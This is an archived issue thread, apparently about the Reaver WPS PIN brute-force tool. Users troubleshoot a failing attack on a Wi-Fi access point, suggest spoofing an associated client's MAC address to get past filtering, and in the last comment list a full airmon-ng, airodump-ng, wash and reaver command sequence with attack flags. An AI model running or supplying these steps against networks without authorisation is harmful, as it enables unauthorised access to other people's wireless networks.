Open GoogleCodeExporter opened 9 years ago
# wash -i mon0 -C -s
give me the following:
BSSID Channel RSSI WPS Version WPS Locked
ESSID
--------------------------------------------------------------------------------
-------------------------------
xx:xx:xx:xx:xx:xx 11 -53 1.0 No
yy
Original comment by yasser.s...@gmail.com
on 15 Feb 2013 at 8:02
Mac filter is enabled for this AP!
Use same MAC as already associated client
Original comment by kostad...@yahoo.com
on 15 Feb 2013 at 8:51
AHAA
first, how could you know that tha mac filter is enabled?
second, I the AP has no clients => I can't crack it?
Original comment by yasser.s...@gmail.com
on 15 Feb 2013 at 9:03
add -a -S -N and try again.
Original comment by deltomaf...@gmail.com
on 5 Mar 2013 at 2:36
use kismet, airodump-ng or what ever you use as a packet capture app to see if
reaver is sending on the correct mac you have for your wireless card, from
looking at the amount of people with same issue and no solution I'm guessing
its a problem with the radio_tap_header been 2 bytes longer than it should be
on some wireless cards.
Original comment by cwjowls...@btinternet.com
on 5 Mar 2013 at 6:14
i have tested my ouwn router whit enabled wireless MAC filter!
so there is no other way to be, no matter what!
Original comment by kostad...@yahoo.com
on 24 Mar 2013 at 8:42
airmon-ng check
#### dhclient#
#### dhclient#
root@bt:~# kill ####
root@bt:~# kill ####
airmon-ng start wlano
airodump-ng mon0
ctrl + v to stop once bssid is found
wash -i mon0 --ignore-fsc
ctrl+v to stop once bssid is found
Manually type in the bssid you want to attack. it is a must!
reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -c 6 --dh-small -s -L -d 5
--lock-delay=315
Original comment by dj.kil...@gmail.com
on 1 Sep 2013 at 8:22
Original issue reported on code.google.com by
yasser.s...@gmail.com
on 15 Feb 2013 at 8:00